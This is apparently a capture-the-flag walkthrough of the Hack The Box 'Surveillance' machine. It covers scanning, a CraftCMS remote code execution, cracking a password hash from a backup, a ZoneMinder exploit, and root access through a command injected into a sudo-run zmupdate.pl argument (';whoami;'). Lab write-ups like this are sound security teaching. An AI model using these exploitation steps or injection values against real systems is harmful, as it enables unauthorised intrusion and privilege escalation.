# Surveillance HTB Walkthrough

## Surveillance HTB Walkthrough

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F4RmVwH1KMFyGkOfyfwgh%2Fimage.png?alt=media&#x26;token=2352aa13-841f-4508-8882-57b4344739ae" alt=""><figcaption></figcaption></figure>

## Reconnaissance

### Scanning

First, I scan the network using **`nmap`**:

```c
nmap -A -o nmap_scan 10.10.11.245
```

I find two open ports:

```c
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
```

### Website Enumeration

Subsequently, I append the following line to **`/etc/hosts`**:

```c
10.10.11.245    surveillance.htb
```

Upon browsing the website, I see it's running **`CraftCMS 4.4.14`**.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FlIHr8AgetpdpvcoaOMfb%2FUntitled.png?alt=media&#x26;token=048c8c02-2a5d-4eb8-8a6f-a0fee86f8f3b" alt=""><figcaption></figcaption></figure>

## Exploitation

### Website Exploitation

I find an Remote Code Execution (RCE) vulnerability: [Exploit-DB 51918](https://www.exploit-db.com/exploits/51918).

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fmsw00wqgSZXW5KfFiMmD%2FUntitled%201.png?alt=media&#x26;token=a5691eed-6f1f-4502-956f-20b32f4110aa" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### **Horizontal privilege escalation**

First, I identify two users:

```c
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash
```

After digging further, I find a backup file containing an SQL query that adds a user named **`Matthew`**.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F8we5bGmYKQYOTVunAwEb%2FUntitled%202.png?alt=media&#x26;token=4ab7661d-64b2-494a-817e-2eb52e210ace" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F24bE72Z4s5l5sMRzkgim%2FUntitled%203.png?alt=media&#x26;token=f693b555-af72-40af-93af-35246082d6db" alt=""><figcaption></figcaption></figure>

I crack the hash using [crackstation.com](https://crackstation.net/)

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FX3OmpW6tNxEWLfHkFAR3%2FUntitled%204.png?alt=media&#x26;token=8cce8b85-be65-46c0-8c31-65f5e63e5b41" alt=""><figcaption></figcaption></figure>

connect with it to SSH

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fxa3HbS69Kbr4z6HaRqC5%2FUntitled%205.png?alt=media&#x26;token=14f1fd6d-5026-4390-9ffb-a1cd0819de04" alt=""><figcaption></figcaption></figure>

Now, let’s see what is `zoneminder`

***ZoneMinder** is an open-source video surveillance software suite that is designed to monitor, record, and manage multiple IP cameras, webcams, and other video sources. It is commonly used for security surveillance purposes in homes, businesses, and other environments where video monitoring is required.*

I found that there is a website running locally on port 8080

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FZJ0gFHbuPgVfZcPgGlNI%2FUntitled%206.png?alt=media&#x26;token=093fcec1-1c1a-444c-a5ee-bec4550ee983" alt=""><figcaption></figcaption></figure>

Here is it

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FuudE75Y0gAsZHtIkHTdQ%2FUntitled%207.png?alt=media&#x26;token=dce36711-c51d-4daa-afab-e3cbc2538ca7" alt=""><figcaption></figcaption></figure>

By using the **`zmc`** command, I was able to determine the version.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FbpdW7LUVsvbeTmv5NiUF%2FUntitled%208.png?alt=media&#x26;token=4b8febe6-322e-4a9f-a9aa-50d422ba5bc6" alt=""><figcaption></figcaption></figure>

Further investigation uncovers a known exploit for RCE: [CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035.git) related to zoneminder 1.36.32

1. I use **`socat`** to make the website externally accessible:

```c
socat TCP-LISTEN:8000,fork TCP:localhost:8080
```

2. running the exploit

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FXbj78yLxHak5nFg67zxj%2FUntitled%209.png?alt=media&#x26;token=a6f00d3a-dca7-4aa1-8d1a-ee659053be89" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FsCaMpcBSWqGrXxnO82TZ%2FUntitled%2010.png?alt=media&#x26;token=1f701dce-15fd-4cfb-a2b9-b71b27d58ded" alt=""><figcaption></figcaption></figure>

### **Vertical privilege escalation**

Now, time to escalate privileges to root, I find that **`zoneminder`** has **`sudo`** access.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2Fh6p5jzcx1F7bImMR3Ju3%2FUntitled%2011.png?alt=media&#x26;token=2175b5e1-486a-46b7-87ba-272a23df3e3b" alt=""><figcaption></figcaption></figure>

Digging deeper, I find that **`zmupdate.pl`** executes a **`mysql`** command based on user input without validation.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2F2devvJxJpiS40m2vqlVT%2FUntitled%2012.png?alt=media&#x26;token=b5b10ab6-7e87-4b1c-b1f4-2fa962f74e87" alt=""><figcaption></figcaption></figure>

testing ….

```c
sudo zmupdate.pl --version 1.12 -u ';whoami;' -p admin 
```

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FbE0xnXk9WvXiVPNttKr2%2FUntitled%2013.png?alt=media&#x26;token=1cf271ea-ceb6-47bf-993e-dfd7b5e2496c" alt=""><figcaption></figcaption></figure>

It work, let's get a shell.

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FFAjhYNWjvmbPvTyhUZb3%2FUntitled%2014.png?alt=media&#x26;token=74eb581d-eda6-42b4-9a5e-d3df96ef5ceb" alt=""><figcaption></figcaption></figure>

BOOM! We are ROOT

<figure><img src="https://2846638943-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fjhs7VC3bQiUZ9gFotYp2%2Fuploads%2FKDsHEf4EGH2rZxjeOfom%2FUntitled%2015.png?alt=media&#x26;token=8bb54e31-357d-4d61-986d-f8f8016919ef" alt=""><figcaption></figcaption></figure>